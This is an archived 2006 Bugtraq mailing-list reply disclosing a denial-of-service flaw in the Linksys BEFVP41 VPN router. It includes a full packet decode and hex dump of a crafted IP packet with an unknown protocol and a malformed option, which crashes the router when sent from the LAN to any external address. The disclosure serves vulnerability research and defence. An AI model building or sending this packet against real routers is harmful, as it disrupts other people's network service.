lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060117204414.2257.qmail@securityfocus.com>
Date: 17 Jan 2006 20:44:14 -0000
From: paul14075@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: Linksys VPN Router (BEFVP41) DoS Vulnerability


I still havent tested the device from the WAN-side.

The packet does not crash the router if it is addressed to the router.  To the crash the router (from the LAN-side, anyway), it must be addressed to an external (WAN-side) IP address.

example:  

router is 192.168.1.1
evil_pc is 192.168.1.101  (evil_pc is a PC attached to one of the ethernet ports on the router.)

evil_pc sends the magic packet to ANY external IP address, for example, www.google.com.  The router will then crash, and need to be rebooted.

magic packet:
No.     Time        Source                Destination           Protocol Info
  11576 989.558120  192.168.1.101         67.8.x.x           IP       Unknown (0xaa)

Frame 11576 (58 bytes on wire, 58 bytes captured)
Ethernet II, Src: 3com_cc:57:86 (00:10:5a:cc:57:86), Dst: Cisco-Li_99:a1:49 (00:0f:66:99:a1:49)
    Destination: Cisco-Li_99:a1:49 (00:0f:66:99:a1:49)
    Source: 3com_cc:57:86 (00:10:5a:cc:57:86)
    Type: IP (0x0800)
Internet Protocol, Src: 192.168.1.101 (192.168.1.101), Dst: 67.8.x.x (67.8.x.x)
    Version: 4
    Header length: 24 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
    Total Length: 44
    Identification: 0x04d2 (1234)
    Flags: 0x00
    Fragment offset: 0
    Time to live: 255
    Protocol: Unknown (0xaa)
    Header checksum: 0x062a [correct]
    Source: 192.168.1.101 (192.168.1.101)
    Destination: 67.8.x.x (67.8.x.x)
    Options: (4 bytes)
        Unknown (0xe4) (with too-short option length = 0 bytes)
Data (20 bytes)

0000  41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50   ABCDEFGHIJKLMNOP
0010  52 53 54 55                                       RSTU

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ